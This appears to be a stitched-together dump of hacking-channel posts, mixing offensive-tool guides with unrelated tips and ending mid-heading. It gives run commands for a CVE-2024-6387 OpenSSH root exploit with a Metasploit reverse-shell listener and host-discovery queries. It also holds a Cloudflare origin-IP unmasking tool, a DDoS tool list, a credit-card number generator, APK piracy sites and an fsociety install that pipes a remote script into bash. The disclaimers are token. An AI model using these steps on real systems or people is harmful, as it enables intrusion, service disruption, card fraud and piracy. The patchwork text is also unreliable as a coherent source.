🦑Cloudflare Bypass:

CrimeFlare - Bypass Cloudflare WAF and Reveal Real IPs

CrimeFlare is a PHP-based tool designed to identify the original IP address of websites protected by Cloudflare's Web Application Firewall (WAF). This information can be valuable for penetration testing and deeper analysis of websites that rely on Cloudflare for anonymity and security.

---

Features:
1. Cloudflare Information:
- Cloudflare-protected IPs.
- Cloudflare NS1 and NS2 details.
2. Real IP Revelation:
- Unmasks the original IP behind Cloudflare protection.
3. Additional Metadata:
- Hostname.
- Organization.
- Location details (Country, City, Region, Postal Code, Time Zone).

---

Disclaimer:
The tool is for educational and lawful penetration testing purposes only. Misuse of CrimeFlare for unauthorized access or malicious activities is illegal and unethical.

---

Installation:

#### Prerequisites:
1. PHP and php-curl must be installed.
Install on Ubuntu:

   sudo apt install php php-curl
   

#### Clone the Repository:

git clone https://github.com/zidansec/CloudPeler.git
cd CloudPeler

#### Run the Script:
To reveal the real IP behind a domain:

php crimeflare.php example.com

#### Easy Installation:
For quick execution from anywhere on Linux:

sudo wget https://github.com/zidansec/CloudPeler/raw/master/crimeflare.php -O /bin/crimeflare
sudo chmod +x /bin/crimeflare

Now you can run CrimeFlare with:

crimeflare example.com

---

### API Sources:
1. CrimeFlare API: [https://crimeflare.zidansec.com](https://crimeflare.zidansec.com)
2. IPInfo API: [http://ipinfo.io](http://ipinfo.io/2.2.2.2/json)

---

### Code Example:
CrimeFlare uses simple PHP scripting with APIs to gather and process data. The script sends HTTP requests to API endpoints and processes JSON responses to display the original IP and related metadata.

---

### Additional OSINT Tool:
OsintSec:
A tool for visualizing networks from domains, IPs, and emails.
[OsintSec Tool](https://osinthreat.herokuapp.com/)

---

### Quick Commands:
- Clone repository:

  git clone https://github.com/zidansec/CloudPeler.git
  

- Execute the script:

  php crimeflare.php example.com
  

- Install for system-wide access:

  sudo wget https://github.com/zidansec/CloudPeler/raw/master/crimeflare.php -O /bin/crimeflare
  sudo chmod +x /bin/crimeflare
  

- Run directly:

  crimeflare example.com
  

---

### GitHub Repository:
Access the archived repository for full documentation and source code:
[CrimeFlare GitHub Repository](https://github.com/zidansec/CloudPeler)

🦑Largest and most advanced AI models available on Hugging Face in 2024:

1. DeepSeek LLM 67B Base
- Parameters: 67 billion
- Highlights: Exceptional at reasoning, coding, and mathematics, surpassing GPT-3.5 and Llama2-70B.
- Official URL: [DeepSeek LLM 67B Base on Hugging Face](https://huggingface.co/models).

2. Yi-34B-Llama
- Parameters: 34 billion
- Highlights: Multi-modal processing for text, code, and images, with zero-shot learning capabilities.
- Official URL: [Yi-34B-Llama on Hugging Face](https://huggingface.co/models).

3. Qwen/Qwen2.5-72B-Instruct
- Parameters: 72 billion
- Highlights: Advanced role-playing, long text generation, and structured data understanding.
- Official URL: [Qwen2.5-72B-Instruct](https://huggingface.co/Qwen/Qwen2.5-72B-Instruct).

4. Llama 3.3-70B-Instruct
- Parameters: 70 billion
- Highlights: Ideal for daily use with highly capable instruction-following capabilities.
- Official URL: [Llama 3.3-70B-Instruct](https://huggingface.co/meta-llama/Llama-3.3-70B-Instruct).

5. Nyxene-v2-11B
- Parameters: 11 billion
- Highlights: Efficient processing and high fluency in text generation and question answering.
- Official URL: [Nyxene-v2-11B](https://huggingface.co/models).

For a comprehensive list of models and their detailed capabilities, visit [Hugging Face's model hub](https://huggingface.co/models).

🦑Best apk mod websites:

1 apkmody https://apkmody.io ✔️
2 modcombo https://modcombo.com ✔️
3 happymod https://happymod.com ✔️
4 modyolo https://modyolo.com ✔️
5 luckymodapk https://www.luckymodapk.com ✔️
6 an1 https://an1.com ✔️
7 getmodsapk https://getmodsapk.com ✔️
8 moddroid https://moddroid.co ✔️
9 modded-1 https://modded-1.com ✔️
10 techbigs https://techbigs.com ✔️
11 apktodo https://apktodo.com ✔️
12 m.playmods https://m.playmods.net ✔️
13 modradar https://modradar.net ✔️
14 apkmodule https://apkmodule.com ✔️
15 modhello https://modhello.com ✔️

🦑Exploit The 2024 OpenSSH sshd:

A critical vulnerability identified as CVE-2024-6387 affects OpenSSH sshd and allows remote unauthenticated attackers to execute arbitrary code as root due to a signal handler race condition. Below is a comprehensive breakdown of this flaw, usage instructions for associated tools, and mitigation strategies.

🔍 Vulnerability Overview
- **Discovered by: Researchers at Qualys in May 2024.
- Root Cause:
A race condition triggered in the SIGALRM handler of sshd when a client fails to authenticate within the LoginGraceTime (default 120 seconds). This handler invokes functions that are not asynchronous-signal-safe, creating a window for exploitation.
- Impact:
- Allows unauthenticated attackers to gain root privileges remotely.
- Exploits the default LoginGraceTime settings.


🌟 Features of Exploitation Tool
1. Rapid Scanning: Scans multiple IPs, domains, or CIDR ranges for this vulnerability.
2. Version Detection: Identifies OpenSSH versions and checks for patched systems.
3. Banner Retrieval: Fetches SSH banners for identification without authentication.
4. Multi-threading: Increases efficiency and exploit chances using concurrent threads.
5. Customizable Outputs: Saves results in formats like JSON, CSV, or plain text.
6. Port Scanning: Detects open/closed ports and highlights non-responsive hosts.
7. IPv6 Support: Fully compatible with IPv6 scanning.

---

⚙️ Usage Instructions
#### Prerequisites
- Ensure Python 3.x is installed.
- Install dependencies (if required):

  pip install -r requirements.txt
  

#### Basic Commands
- Scan a Target:

  python3 CVE-2024-6387.py scan -T example.com -p 22
  

- Exploit a Target:

  python3 CVE-2024-6387.py exploit -T example.com -p 22 -n eth0
  

#### Advanced Options
| Argument | Description | Default |
|-----------------------|--------------------------------------------------------------|--------------|
| -T, --targets | IP, domain, file path, or CIDR range to scan. | N/A |
| -p, --port | SSH port to target. | 22 |
| -s, --speed | Threads for scanning/exploitation. | 10 |
| -t, --timeout | Connection timeout in seconds. | 1 |
| -o, --output | Output format (csv, txt, json). | json |
| -g, --gracetimecheck| Check for LoginGraceTime mitigation (seconds). | 120 |

---

### Escalation Process
#### Setting Up Payload Listener
Before exploiting, set up a reverse shell listener:

msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST {yourip}; set LPORT 9999; exploit -j"

#### Exploitation Example
Run the exploit tool with the configured settings:

python3 CVE-2024-6387.py exploit -T target.com -p 22 -n eth0

---

### 🔍 Host Discovery
#### OSINT Techniques
- Hunter: /product.name="OpenSSH"
- FOFA: app="OpenSSH"
- SHODAN: product:"OpenSSH"
- CENSYS: (openssh) and labels=remote-access

---

### 🛡 Mitigation Strategies
1. Patch Management
- Upgrade to the latest patched version of OpenSSH to close this vulnerability.

2. Limit Access
- Restrict SSH access to trusted IPs/networks using firewalls or VPNs.

3. Enable Monitoring
- Use IDS/IPS tools to detect and prevent exploitation attempts.

4. Network Segmentation
- Isolate critical systems to reduce lateral movement risks in case of compromise.

5. Log Analysis
- Continuously monitor logs for unusual SSH activities or patterns.

Color-Coded Output
- 🟢 Green: Successful connection or exploit.
- 🔴 Red: Failed connection or error.
- 🟡 Yellow: Warnings or notable information.
- 🔵 Cyan: General updates or information.

Full on: https://github.com/asterictnl-lvdw/CVE-2024-6387

🦑Top DDoS Tools for Educational Penetration Testing in 2024:

Disclaimer: This list is strictly for educational and ethical purposes. Unauthorized use of these tools for malicious activities is illegal and punishable by law. Always seek proper authorization before conducting penetration testing.


1. [LOIC (Low Orbit Ion Cannon)](https://sourceforge.net/projects/loic/)
- Description: A classic open-source tool designed for stress testing. LOIC is beginner-friendly and allows users to send HTTP, UDP, or TCP packets to a target.
- Features:
- User-friendly GUI.
- Manual or automatic attack modes.
- Use Case: Useful for testing smaller systems under stress.

---

2. [HOIC (High Orbit Ion Cannon)](https://github.com/grayhats/hoic)
- Description: An upgraded version of LOIC, HOIC can send multiple HTTP requests simultaneously, making it more potent.
- Features:
- "Booster" scripts to amplify attack strength.
- Open-source.
- Use Case: Effective for simulating HTTP-based volumetric attacks.

---

3. [Xerxes](https://github.com/zanyarjamal/xerxes)
- Description: A lightweight yet powerful tool for layer-7 DDoS attacks.
- Features:
- Portable and efficient.
- Easy-to-use command-line interface.
- Use Case: Ideal for testing web servers' resilience to high-volume HTTP requests.

---

4. [HULK (HTTP Unbearable Load King)](https://github.com/grafov/hulk)
- Description: A unique tool designed for testing web servers by generating dynamic and random HTTP GET requests.
- Features:
- Evades caching mechanisms with randomized requests.
- Simple to configure.
- Use Case: Used for stress-testing websites against large traffic surges.

---

5. [GoldenEye](https://github.com/jseidl/GoldenEye)
- Description: A Python-based tool for generating HTTP and HTTPS requests to overwhelm web servers.
- Features:
- Advanced request customization.
- Supports both HTTP and HTTPS.
- Use Case: Testing web applications for resilience against layer-7 DDoS attacks.

---

6. [UFONet](https://github.com/epsylon/ufonet)
- Description: A multi-vector tool that leverages open proxies and botnets for stress testing.
- Features:
- Supports multiple attack vectors.
- GUI and CLI interfaces available.
- Use Case: Testing distributed attacks with open proxy networks.

---

7. [DDOSIM (DDoS Simulator)](https://sourceforge.net/projects/ddosim/)
- Description: A simulation tool that replicates a botnet by performing DDoS attacks like TCP, HTTP, and UDP floods.
- Features:
- Simulates real botnet behavior.
- Layer-7 attack simulation.
- Use Case: Ideal for advanced penetration testers studying application-layer attacks.

🦑 Large CTF collections:

### TryHackMe (THM) Links
1. [Official TryHackMe Website](https://tryhackme.com)
2. [TryHackMe Learning Paths](https://tryhackme.com/paths)
3. [Free Rooms on TryHackMe](https://tryhackme.com/free)
4. [TryHackMe Discord Community](https://discord.gg/tryhackme)
5. [TryHackMe Blog](https://blog.tryhackme.com)
6. [GitHub: Awesome TryHackMe Writeups](https://github.com/0xagun/awesome-tryhackme-writeups)

### Popular CTF Platforms
7. [Hack The Box](https://www.hackthebox.com/)
8. [CTFtime](https://ctftime.org/)
9. [PicoCTF](https://picoctf.org/)
10. [Root Me](https://www.root-me.org/)
11. [OverTheWire Wargames](https://overthewire.org/)
12. [CyberSecLabs](https://cyberseclabs.co.uk/)
13. [THM vs HTB Writeups](https://github.com/Ignitetechnologies)

### CTF Challenges & Resources
14. [Cryptohack](https://cryptohack.org/)
15. [WeChall Challenges](https://www.wechall.net/)
16. [Challenges on CTFlearn](https://ctflearn.com/)
17. [W3Challs](https://w3challs.com/)
18. [Hacker101 CTF](https://ctf.hacker101.com/)
19. [Defend the Web](https://defendtheweb.net/)
20. [RingZer0 Team Online CTF](https://ringzer0ctf.com/)

### Tools for Practice
21. [VulnHub](https://www.vulnhub.com/)
22. [TryHackMe GitHub Repository](https://github.com/topics/tryhackme)
23. [CTFd (Create Your Own CTF)](https://ctfd.io/)
24. [CrackStation](https://crackstation.net/)

### Writeups and Blogs
25. [CTF Writeups GitHub](https://github.com/ctfs/write-ups-2019)
26. [TryHackMe Subreddit](https://www.reddit.com/r/tryhackme/)
27. [Hack The Box Subreddit](https://www.reddit.com/r/hackthebox/)
28. [Infosec Writeups on Medium](https://medium.com/bugbountywriteup)

### Learning Resources
29. [Hack This Site](https://www.hackthissite.org/)
30. [Cyber Security Challenge](https://cybersecuritychallenge.org.uk/)
31. [OWASP Juice Shop](https://owasp.org/www-project-juice-shop/)
32. [CTF Field Guide (Trail of Bits)](https://trailofbits.github.io/ctf/)
33. [SANS Holiday Hack Challenge](https://www.sans.org/mlp/holiday-hack-challenge/)
34. [CrackMe Challenges](https://crackmes.one/)

### Forums and Communities
35. [Reddit - r/CTF](https://www.reddit.com/r/CTF/)
36. [InfoSec Community Discord](https://discord.gg/infosec)
37. [Hacker News](https://news.ycombinator.com/)

### Beginner-Friendly
38. [PentesterLab](https://pentesterlab.com/)
39. [Bandit Wargame](https://overthewire.org/wargames/bandit/)
40. [Microcorruption](https://microcorruption.com/)

### Advanced Challenges
41. [Real World CTF](https://realworldctf.com/)
42. [Google CTF](https://capturetheflag.withgoogle.com/)
43. [Flare-On Challenge](https://www.flare-on.com/)
44. [Hack.lu CTF](https://2019.hack.lu/index.html)

### Additional GitHub Resources
45. [Awesome CTF](https://github.com/apsdehal/awesome-ctf)
46. [CTF Wiki](https://ctf-wiki.org/)
47. [HackTricks](https://book.hacktricks.xyz/)
48. [Payloads All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings)
49. [SecLists](https://github.com/danielmiessler/SecLists)

### Bonus Links
50. [Practice Labs from Security Blue Team](https://securityblue.team/practice/)

🦑Phishing email analysis:

1. Mail Header Analysis
- Tool: exiftool or mha-parser
- Usage: Extract and analyze email headers to trace the source.

     exiftool email.eml
     

2. Link Analysis
- Tool: urlscan.io CLI or PhishTank API
- Usage: Check if links are flagged as malicious.

     curl -X POST --data-urlencode 'url=http://example.com' https://urlscan.io/api/v1/scan/
     

3. Attachment Analysis
- Tool: ClamAV
- Usage: Scan attachments for malware.

     clamscan attachment.zip
     

4. Text Analysis
- Tool: strings or grep
- Usage: Extract and analyze suspicious text patterns.

     strings email.eml | grep -i "password"
     

5. Complete Email Analysis
- Tool: PyMISP
- Description: Use this open-source framework to analyze and share Indicators of Compromise (IOCs).

6. Sandbox Analysis
- Tool: Cuckoo Sandbox
- Usage: Isolate and run suspicious files or links for dynamic analysis.

Installation Example
For ClamAV:

sudo apt update
sudo apt install clamav
sudo freshclam  # Update virus definitions

🦑 LBin Credit Card Generator: (Android/Linux/Windows)

The LBin Credit Card Generator is a Python-based tool used for generating valid credit and debit card numbers. It provides details about the bank and the card number, along with the ability to generate combinations of 3-digit codes and expiry dates.

⚠️ Ethical Use Warning
This tool should only be used for ethical purposes. Unauthorized generation and use of credit card numbers is illegal and unethical.



📋 Quick Start Guide

#### Windows Installation
1. Install Git
Download Git for Windows [here](https://git-scm.com/download/win). Ensure you select the option to add Git to the system PATH during installation.

2. Install Python
Download Python [here](https://www.python.org/downloads/), making sure to check the "Add Python to PATH" option during installation.

3. Clone the Repository
Open the command prompt and clone the repository:

   git clone https://github.com/lalaio1/LBin-CC-generator-.git
   

4. Navigate to the Project Directory

   cd LBin-CC-generator-
   

5. Run the Script

   python start.py
   

Linux Installation
1. Clone the Repository

   git clone https://github.com/lalaio1/LBin-CC-generator-.git
   

2. Navigate to the Project Directory

   cd LBin-CC-generator-
   

3. Add Execution Permissions

   chmod +x start.py
   

4. Run the Script

   python3 start.py
   

#### Termux (Android) Installation
1. Install Termux
Download and install [Termux](https://play.google.com/store/apps/details?id=com.termux) from the Google Play Store.

2. Install Git

   pkg install git
   

3. Install Python

   pkg install python3
   

4. Clone the Repository

   git clone https://github.com/lalaio1/LBin-CC-generator-.git
   

5. Navigate to the Project Directory

   cd LBin-CC-generator-
   

6. Add Execution Permissions

   chmod +x start.py
   

7. Run the Script

   python3 start.py
   

💻 Supported Operating Systems
- Windows 💻
- Linux 🐧
- Termux (Android) 📱

🦑Cars Hacking Utilities:

- [How to hack a car — a quick crash-course](https://medium.freecodecamp.org/hacking-cars-a-guide-tutorial-on-how-to-hack-a-car-5eafcfbbb7ec) - Car enthusiast Kenny Kuchera illustrates just enough information to get you up and running. An excellent resource for first timers!

- [Stopping a Jeep Cherokee on the Highway Remotely](https://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/) - Chris Valasek's and Charlie Miller's pivotal research on hacking into Jeep's presented at DEFCON in 2015.

- [Troy Hunt on Controlling Nissans](https://www.troyhunt.com/controlling-vehicle-features-of-nissan/) - Troy Hunt goes into controlling Nissan vehicles.

- [Tesla hackers explain how they did it at Defcon](http://www.cnet.com/roadshow/news/tesla-hackers-explain-how-they-did-it-at-def-con-23/) - Overview of DEFCON 23 presentation on hacking into Tesla cars.

- [Anatomy of the Rolljam Wireless Car Hack](http://makezine.com/2015/08/11/anatomy-of-the-rolljam-wireless-car-hack/) - Overview of the RollJam rolling code exploitation device.

- [IOActive's Tools and Data](http://blog.ioactive.com/2013/08/car-hacking-content.html) - Chris Valasek and Charlie Miller release some of their tools and data for hacking into vehicles in an effort to get more people into vehicle security research.

- [Developments in Car Hacking](https://www.sans.org/reading-room/whitepapers/ICS/developments-car-hacking-36607) - via the SANS Reading Room, Currie's paper analyses the risks and perils of smart vehicle technology.

- [Car Hacking on the Cheap](http://www.ioactive.com/pdfs/IOActive_Car_Hacking_Poories.pdf) - A whitepaper from Chris Valasek and IOActive on hacking your car when you don't have a lot of resources at your disposal.

- [Car Hacking: The definitive source](http://illmatics.com/carhacking.html) - Charlie Miller and Chris Valasek publish all tools, data, research notes, and papers for everyone for free

- [Car Hacking on the cheap](https://community.rapid7.com/community/transpo-security/blog/2017/02/08/car-hacking-on-the-cheap) - Craig Smith wrote a brief article on working with Metasploit’s HWBrige using ELM327 Bluetooth dongle

- [Researchers tackle autonomous vehicle security](https://phys.org/news/2017-05-tackle-autonomous-vehicle.html) - Texas A&M researchers develop intelligence system prototype.

- [Reverse engineering of the Nitro OBD2](https://blog.quarkslab.com/reverse-engineering-of-the-nitro-obd2.html) - Reverse engineering of CAN diagnostic tools.

- [Analysis of an old Subaru Impreza - Subaru Select Monitor v1 (SSM1)](https://p1kachu.pluggi.fr/project/automotive/2018/12/28/subaru-ssm1/) - Digging into an old ECU through an old protocol and disabling a 1997 Subaru Impreza's speed limiter.

- [Car Hacking in 30 Minutes or Less](https://brysonpayne.com/2018/10/20/start-car-hacking-in-30-minutes-or-less/) - Using VirtualBox and Kali Linux, you can start car hacking using completely free open-source software and tools, including can-utils, ICSim, ScanTool, Wireshark, and tcpdump

Source

🦑How End Users Can Be Susceptible to Malicious PDF Attacks: A Practical Illustration

End users often underestimate the risks of downloading and opening PDFs, assuming these files are harmless. However, attackers can exploit vulnerabilities in PDF readers or embed malicious payloads to compromise a system. Here's an illustrative example of how this attack can be executed: Kali Linux as the attacker's machine, Windows 7 as the victim's machine, and the Metasploit Framework for exploitation.
Attackers often use social engineering to trick the victim into downloading the malicious file:

· Email Phishing: The attacker sends an email impersonating a trusted entity, with the malicious.
PDF attached or linked.

· Drive-By Downloads: Hosting the PDF on a compromised or malicious website.

· USB Drops: Leaving USB devices with the file in public places.

· File Sharing Platforms: Publicly accessible platforms for file sharing, such as peer-to-peer networks or forums, can also be a source of malicious PDFs. Hackers upload infected files disguised as free resources.

Mitigation Strategies
To prevent such attacks, end users and organizations should:

· Update Software Regularly: Keep operating systems and applications, including PDF readers, up to date.

· Use Anti-Malware Tools: Employ advanced threat detection tools to identify and block malicious payloads.

· Be Cautious of Unknown Sources: Avoid downloading files from unknown emails or untrusted websites.

· Sandboxing: Open unknown files in isolated environments to limit potential damage.

· Security Awareness Training: Educate users about phishing tactics and the dangers of opening unsolicited attachments.

🦑Wordlist: 1.6 billion passwords:

https://github.com/piotrcki/wordlist/releases/tag/v0.0.0

🦑Create your own Wordlist:
The tool Crunch is a wordlist generator used for creating custom wordlists based on specific parameters:

Basic Usage:

./crunch <min-len> <max-len> [charset]

For example:

./crunch 3 7 abcdef

This command generates all combinations of characters abcdef between lengths 3 and 7.

### Options Overview:
- -b: Limit the output file size (in bytes). For example, -b 10MB will stop each file at 10MB.
- -c: Limit the number of lines per file, useful when splitting large wordlists.
- -d: Avoid sequences with too many duplicate characters. E.g., -d 2@ suppresses more than 2 adjacent identical letters.
- -e: Stop at a specific string (useful for large datasets).
- -f: Use predefined character sets from a file (e.g., charset.lst).
- -i: Invert the order of character changes (useful for some cracking methodologies).
- -l: Use literal characters in patterns.
- -o: Specify an output file for the generated list.
- -p: Generate all permutations without repeating characters.
- -t: Use patterns to control string structure (e.g., @@god@@ where @ is replaced with lowercase letters).
- -z: Compress the output directly into formats like gzip, bzip, lzma, or 7z.

### Advanced Examples:
1. Generate a list of passwords with a fixed structure:

   ./crunch 8 8 -t abcd@@@@ -o passwords.txt
   

Output contains 8-character passwords starting with abcd.

2. Limit to 100 lines per file:

   ./crunch 5 5 abcdef -o START -c 100
   

3. Create a compressed output:

   ./crunch 4 6 1234 -o wordlist.gz -z gzip
   

4. Avoid adjacent duplicates:

   ./crunch 5 5 abc -d 2@
   

Excludes passwords like aabbc.

Crunch is powerful and highly configurable, making it ideal for creating targeted wordlists for penetration testing or other tasks. For detailed documentation, visit the [Crunch SourceForge page](https://sourceforge.net/projects/crunch-wordlist/).

🦑Specified AI models for Hacking By The Canstralian:

https://huggingface.co/Canstralian

🦑ALL Mr. ROBOT TOOLS IN 1

Key Categories & Tools

1. Information Gathering
- Nmap: Network scanning and vulnerability analysis.
- Setoolkit: Social engineering framework.
- WPScan: WordPress vulnerability scanner.
- CMS Scanner: Identify CMS-specific weaknesses.
- XSStrike: Cross-site scripting (XSS) scanner.
- Dork: Google dorks for passive auditing.

#### 2. Password Attacks
- Cupp: Custom wordlist generation.
- Ncrack: Network authentication cracking.

#### 3. Wireless Testing
- Reaver: WPA/WPA2 key recovery.
- Pixiewps: Offline WPS brute-forcing.
- Bluetooth Honeypot: Bluetooth security testing.

#### 4. Exploitation Tools
- sqlmap: Automated SQL injection.
- Commix: Command injection.
- Shellnoob: Shellcode generator.

#### 5. Sniffing & Spoofing
- SSLtrip: SSL stripping attacks.
- pyPISHER: Phishing attacks.

#### 6. Web Hacking
- Scanners for WordPress, Joomla, Gravity Forms, and file upload vulnerabilities.
- Exploitation scripts for CMS and frameworks like Drupal and Vbulletin.

#### 7. Private Web Hacking
- Tools to locate websites, control panels, zip files, and server users.
- Cloudflare bypass techniques.

#### 8. Post Exploitation
- Tools like Shell Checker, POET, and Weeman for maintaining access and collecting information.

---

### Installation
- Linux:

  bash <(wget -qO- https://git.io/vAtmB)
  

- Windows: Install a Linux-like environment (e.g., Cygwin) and Python.
- Termux (Android): Same Linux command applies.
- Cloud Services: Use Google Cloud Console or free Ubuntu VPS (e.g., c9.io).

---

### Additional Notes
- Python Compatibility: Works with Python 2. For Python 3, check the updated repository: fsociety-team/fsociety.
- License: MIT License, open-source and free to use.

Would you like help setting it up or exploring specific tools?

🦑 Fix Any Broken Package Using Aptitude

Aptitude is a powerful command-line tool for managing packages on Debian-based systems. One of its key features is the ability to identify and resolve issues with broken packages. Broken packages can cause problems with system updates, installations, or removals, making it essential to fix them promptly.

### Steps to Fix Broken Packages Using Aptitude

1. Install Aptitude (if not already installed):
If you don’t have Aptitude on your system, you can install it using:

   sudo apt update
   sudo apt install aptitude
   

2. Check for Broken Packages:
To identify issues, run the following command:

   sudo aptitude search ~b
   

This will list all broken packages currently installed on your system.

3. Attempt to Automatically Fix Broken Packages:
Use the following command to let Aptitude automatically resolve issues:

   sudo aptitude --fix-broken install
   

Aptitude will analyze the dependency tree and propose solutions, such as installing missing dependencies or removing conflicting packages. You can review and approve these solutions interactively.

4. Handle Manual Interventions (if needed):
If Aptitude cannot resolve an issue automatically, it may offer multiple options for resolution. Carefully read the options and choose the one that best fits your needs.
Use:

   sudo aptitude
   

This opens a text-based interface where you can navigate and manage packages interactively.

5. Verify and Clean Up:
After fixing broken packages, update and clean your package list to ensure everything is in order:

   sudo apt update
   sudo apt autoremove
   sudo apt clean
   

### Benefits of Using Aptitude
- Interactive Interface: Aptitude provides a user-friendly text UI for resolving package conflicts.
- Better Dependency Handling: It offers smarter solutions for complex package dependency issues.
- Robust Options: Aptitude allows in-depth package management compared to apt or dpkg.

By using Aptitude, you can effectively fix any broken package and maintain a stable system.

🦑Reverse Engineering with Ghidra :

https://youtu.be/d4Pgi5XML8E (Part 1)

https://youtu.be/uyWVztMHWtk (Part 2)

https://youtu.be/RFG5FuqY0CE (Part 3)

https://youtu.be/5QBXNF7FKxM (Part 4)

🦑Evaluating and comparing machine learning (ML) and artificial intelligence (AI) algorithms at scale.

- Custom evaluation protocols: Supports different evaluation phases, dataset splits, and metrics, with both public and private leaderboards.
- Remote evaluation: For large-scale challenges requiring special compute capabilities, EvalAI allows organizers to add worker nodes to process submissions.
- Evaluation inside environments: Submissions are evaluated in Docker containers, ensuring a consistent environment.
- CLI support: The evalai-cli tool extends the platform’s capabilities to the command line.
- Portability and scalability: Built on open-source technologies like Docker, Django, Node.js, and PostgreSQL for easy deployment and scalability.
- Faster evaluation: Optimization techniques like dataset chunking and multi-core processing speed up evaluations.

For installation, EvalAI can be set up using Docker with the following steps:

1. Install Docker and Docker Compose.
2. Clone the source code from the repository:

   git clone https://github.com/Cloud-CV/EvalAI.git evalai && cd evalai
   

3. Build and run the Docker containers:

   docker-compose up --build
   

4. Access the platform at http://127.0.0.1:8888.

Default users include:
- SUPERUSER: username: admin, password: password
- HOST USER: username: host, password: password
- PARTICIPANT USER: username: participant, password: password

🦑Legit Win 11 Activator:

@ECHO off
cls

:: Prompt for the product key
set /p productKey="Enter your Windows 11 product key: "

:: Set the product key and install it
cscript slmgr.vbs /ipk %productKey%

:: Activate Windows with the Microsoft servers
cscript slmgr.vbs /ato

:: Check activation status
cscript slmgr.vbs /dli

pause

🦑Perl Hacking